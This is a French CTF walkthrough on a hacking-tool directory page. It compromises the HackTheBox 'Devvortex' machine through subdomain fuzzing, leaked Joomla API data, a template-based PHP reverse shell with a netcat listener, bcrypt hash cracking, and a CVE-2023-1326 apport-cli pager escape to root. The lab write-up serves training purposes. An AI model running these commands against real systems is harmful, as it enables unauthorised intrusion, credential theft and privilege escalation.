Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
DEVVORTEX — Parcours HackTheBox Devvortex couvrant le fuzzing de sous-domaines, l'énumération de l'API Joomla, un web shell basé sur template, le cassage de hash bcrypt et l'élévation de privilèges via Apport-CLI CVE-2023-1326. | Kitploit
Outils/GitHubGitHub/r3fr4kt/devvortex
Cassage de Mots de PasseEscalade de PrivilègesAnalyse des VulnérabilitésExploitation d'Applications WebCollecte d'InformationsCTFTests d'IntrusionÉnumération de Sous-domainesApprentissage et ÉducationLabs et Pratique
GitHubr3fr4kt/devvortex
il y a 7h 58mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

DEVVORTEX

Parcours HackTheBox Devvortex couvrant le fuzzing de sous-domaines, l'énumération de l'API Joomla, un web shell basé sur template, le cassage de hash bcrypt et l'élévation de privilèges via Apport-CLI CVE-2023-1326.

Voir le dépôt

DEVVORTEX

HackTheBox : Devvortex — Write-Up de la machine

Un walkthrough technique complet détaillant la compromission de la machine Devvortex sur HackTheBox. Ce parcours illustre le fuzzing de sous-domaines, l'énumération de l'API Joomla, la modification de template pour l'accès initial, l'extraction et le cassage de hash de base de données pour le mouvement latéral, et l'exploitation d'Apport-CLI (CVE-2023-1326) pour l'élévation de privilèges vers root.


Résumé exécutif

  • OS cible : Linux
  • Difficulté : Facile
  • Domaine : devvortex.htb
  • Sous-domaine : dev.devvortex.htb
  • Concepts clés : Énumération de sous-domaines, exploitation du CMS Joomla, divulgation d'informations, cassage de hash Bcrypt, abus de Sudo (apport-cli).

1. Reconnaissance et énumération

Scan de ports (Nmap)

Une découverte rapide initiale des ports TCP a été effectuée sur tous les ports :

root@kitploit:~
nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

Un scan ultérieur de détection de services et de versions a été exécuté contre les ports ouverts identifiés :

Bash

root@kitploit:~
nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

Configuration du fichier hosts

Ajoutez le domaine cible de base à votre table de résolution de noms locale :

Bash

root@kitploit:~
sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

Découverte de sous-domaines (FFUF)

Fuzzing des hôtes virtuels pour identifier des ressources web supplémentaires :

Bash

root@kitploit:~
ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

Résultat : Découverte de dev.devvortex.htb. Ajout de dev.devvortex.htb dans /etc/hosts.

Fuzzing de répertoires

Énumération des routes sur l'hôte virtuel nouvellement découvert :

Bash

root@kitploit:~
ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

Résultat : Découverte du point de terminaison /administrator, exposant un portail d'authentification administrateur Joomla.

2. Accès initial (Foothold)

Fuite d'informations via l'API Joomla

Sondage des points de terminaison publics exposés par l'API REST de Joomla pour recueillir des métriques applicatives sensibles et des utilisateurs :

Bash

root@kitploit:~
curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

Injection de web shell via les templates du site

À l'aide des identifiants découverts lors de l'énumération, connectez-vous au portail /administrator de Joomla :

  1. Naviguez vers System > Site Templates.

  2. Sélectionnez le template actif et ouvrez error.php.

  3. Remplacez le contenu de error.php par une charge utile standard de reverse shell PHP.

Initialisez un listener netcat local :

Bash

root@kitploit:~
nc -lvnp 4444

Déclenchez l'exécution de error.php en demandant une page inexistante ou en accédant directement au fichier.

Stabilisation du shell TTY

Une fois le shell connecté en tant que www-data, lancez une session PTY interactive :

Bash

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

3. Mouvement latéral (Logan)

Énumération de la base de données

Accédez à la base de données MySQL locale à l'aide des identifiants récupérés dans les fichiers de configuration web :

Bash

root@kitploit:~
mysql -u lewis -p

Interrogez la table des utilisateurs pour localiser les hash d'identifiants stockés :

SQL

root@kitploit:~
SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

Cassage de mot de passe hors ligne

Extrayez le hash de mot de passe bcrypt de l'utilisateur logan dans un fichier local :

Bash

root@kitploit:~
nano hash.txt

Cassez le hash à l'aide de John the Ripper avec rockyou.txt :

Bash

root@kitploit:~
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Authentification via SSH

Établissez une session SSH persistante en tant qu'utilisateur logan avec les identifiants cassés :

Bash

root@kitploit:~
ssh [email protected]

Flag utilisateur

Bash

root@kitploit:~
cat user.txt

4. Élévation de privilèges

Audit des privilèges Sudo

Inspectez les binaires autorisés pour l'utilisateur logan :

Bash

root@kitploit:~
sudo -l

Sortie : L'utilisateur peut exécuter /usr/bin/apport-cli en tant que root.

Exploitation d'Apport-CLI (CVE-2023-1326)

Vérifiez la version installée d'apport-cli :

Bash

root@kitploit:~
apport-cli --version

Inspectez /var/crash pour les fichiers de rapport existants. S'il est vide, créez manuellement un fichier de crash :

Bash

root@kitploit:~
echo "ProblemType: Crash" > /var/crash/.crash

Lancez apport-cli contre le fichier de crash créé en utilisant sudo :

Bash

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. Appuyez sur v pour View report.

  2. Lorsque le paginateur (less) charge le contenu, échappez vers un shell système en saisissant :

Plaintext

root@kitploit:~
!/bin/bash

5. Consolidation du système

Vérifiez l'élévation root :

Bash

root@kitploit:~
whoami
# Output: root

Flag root

Bash

root@kitploit:~
cat /root/root.txt
Télécharger l’outil